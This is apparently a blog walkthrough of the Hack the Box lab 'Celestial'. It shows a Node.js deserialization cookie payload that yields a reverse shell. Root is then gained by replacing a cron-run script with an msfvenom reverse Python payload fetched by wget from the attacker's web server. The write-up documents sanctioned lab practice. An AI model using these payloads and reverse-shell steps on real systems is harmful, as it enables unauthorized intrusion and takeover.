Hello friends!! Today we are going to
solve another CTF challenge “Celestial” which is lab presented by Hack
the Box and is available online for those who want to increase their
skill in penetration testing and black box testing. Celestial is retired
vulnerable lab presented by Hack the Box for making online penetration
practices according to your experience level; they have the collection of
vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: find user.txt and root.txt file
in victim’s machine.
WalkThrough
Since these labs are online available therefore they have static
IP. The IP of Celestial is 10.10.10.85
Let’s start off with scanning the network to find our
target.
nmap -A 10.10.10.85
The NMAP output shows us that the port TCP 3000 is opened on
the target machine Let’s try to access
the website on a Non-standard HTTP port (3000) as follows :
Browse to http://10.10.10.85:3000 and we will
be greeted with the following page
As we didn’t find any other clue
to move forward after navigating through many other possibilities; we quickly
moved further to understand the website request via Burpsuite tool. Therefore, upon
capturing the webpage’s GET request, we noticed the profile= Cookie parameter (highlighted in red)
Copy the entire value inside the profile= cookie parameter and paste it
in the Burpsuite decoder .
eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D
On decoding the same we will get the output in base64 format
. Once again , we will decode the base64 format output and would be able to see
the results in clear text format. The output displays username and other
details of a specific user This is an indication that we can insert our code in
the cookie profile parameter value to get the desired results.
On further investigation , we came to know that this is a
Node JS deserialization bug for the purpose of remote code execution . Further
details of the same are mentioned in the below website .If we read the entire
content of the website , we will observe that there is a function which
contains a particular string comprising of multiple numeric values.
Copy the entire numeric content (after String.fromCharCode) starting from 10 till 10 . Navigate to the URL
https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html
and convert Decimal to ASCII as shown in the screenshot below
Now let’s change the contents of the ASCII text and replace
the HOST and PORT parameter details with the HOST=10.10.14.3 and PORT= 4444,
where 10.10.14.3 is our Kali machine IP . Once done, we will get the equivalent
output in the Decimal format as shown below
Copy the decimal output from the above screenshot starting
from 118 and ending with 10, with each number , separated by a comma.
Note : As we can
see that the decimal output in the above output is separated by a space , hence
we need to either do it manually OR need to refer to the following Python
script method so as to include the comma values , before proceeding further
Once the decimal output (separated by comma) is ready , we
need to now paste it inside the code shown below (replace the value with
decimal output) and perform the Base64 encode of the same
echo {"username":"_$$ND_FUNC$$_function
(){ eval(String.fromCharCode(value) )}()"}
| base64 -w0
Copy the encoded output above and paste it in front of the Profile= parameter of the Burpsuite as
shown in the image below.
Once done we need to click on the Forward option , in
Burpsuite Intercept tab
Note : Before
forwarding the modified content in Burpsuite , we should setup the netcat listener
in Kali machine and keep it ready .
nc -lvp 4444
In order to
access proper TTY shell , we had imported python one line script by typing
following:
python -c 'import
pty;pty.spawn("/bin/bash")'
Hurray !! We got into the reverse shell of the target
machine
Lets have a quick look at the contents
ls
We navigated to many folders , however found interesting
stuff in the Documents folder
cd Documents
Here we can see that there is a user.txt file , lets read it
contents
cat user.txt
Finally , we got our first flag i.e output of user.txt file
Now upon
further navigation , we also opened the script.py
file because of our curiosity to examine the contents of the same . If we do cat script.py , the output displays as print “Script is running”
cat script.py
print “Script is running..”
Note : This is an
indication that we may need to examine the log files to see which script is
running and if it is running on a periodic basis
The best
step to move forward is to examine the contents of the log directory in var
cd /var/log
Let’s see
the files listed over here
ls
As we can
see that there are multiple syslog files being generated in this folder . The old
logs are being zipped and numbered accordingly .The latest logs are always stored
in the log file named syslog .So we
will open the contents of the syslog file and try to find out if there is
something interesting going on.
cat syslog
We will
notice that there is a cronjob running every 5 minutes , which is copying the
output of script.py file (in the home/sun/Documents folder) to the output.txt
file
Now we can try to put our own content in the script.py file
. For this let’s generate a Reverse shell with the following command
msfvenom -p cmd/unix/reverse_python
lhost=10.10.14.3 lport=1234 R
Copy the
contents of msfvenom output and save it on Kali Desktop named as script.py ,which will be further used
in the subsequent steps
Now run the
web server on the Kali machine
python –m SimpleHTTPServer 80
Lets read
the contents of the script.py .The output displays as print “Script is running..”
cat script.py
Lets move this
original python script (script.py) by
renaming it to script.py.original as
shown below
mv script.py script.py.original
Download our
newly created script.py from the Kali machine Desktop
wget http://10.10.14.3/script.py
Open a netcat reverse shell
nc -lvp 1234
In order to
access proper TTY shell , we had imported python one line script by typing
following:
python -c 'import
pty;pty.spawn("/bin/bash")'
Hurray!! We got into the root
Navigate to the root directory
cd /root
Let’s see
what content it has .
ls
As we can see it contains 2 files root.txt and script.py . Lets open
root.txt file
cat root.txt
Wonderful!! We have gained access to both user.txt and
root.txt files and hacked this box.
0 comments:
Post a Comment